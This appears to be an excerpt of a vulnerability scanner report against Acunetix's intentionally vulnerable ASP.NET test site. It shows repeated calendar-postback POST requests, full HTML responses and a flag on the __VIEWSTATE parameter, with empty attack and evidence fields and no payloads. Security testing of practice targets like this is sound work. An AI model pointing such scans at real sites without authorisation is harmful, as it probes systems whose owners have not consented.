Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8233&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA1EqHZ9oIZGRkx%2B8vR9DSoLFbK%2FCoX5%2BaZpzJ8d4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdwevxDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8QVj0C7DgPYH8Q5ZnSbbMSgG%2Bmig%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:24 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA1EqHZ9oIZGRkx+8vR9DSoLFbK/CoX5+aZpzJ8d4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdwevxDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8QVj0C7DgPYH8Q5ZnSbbMSgG+mig==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:White" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8221&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA300ZXtoIZGRkaCXqw1Z7IAZq8XLNbnSndSriRpk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy7qecDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM%2F4LikeZ9MJ02PC5ZpHxpKYZVKg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:28 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA300ZXtoIZGRkaCXqw1Z7IAZq8XLNbnSndSriRpk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy7qecDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M/4LikeZ9MJ02PC5ZpHxpKYZVKg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:White" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
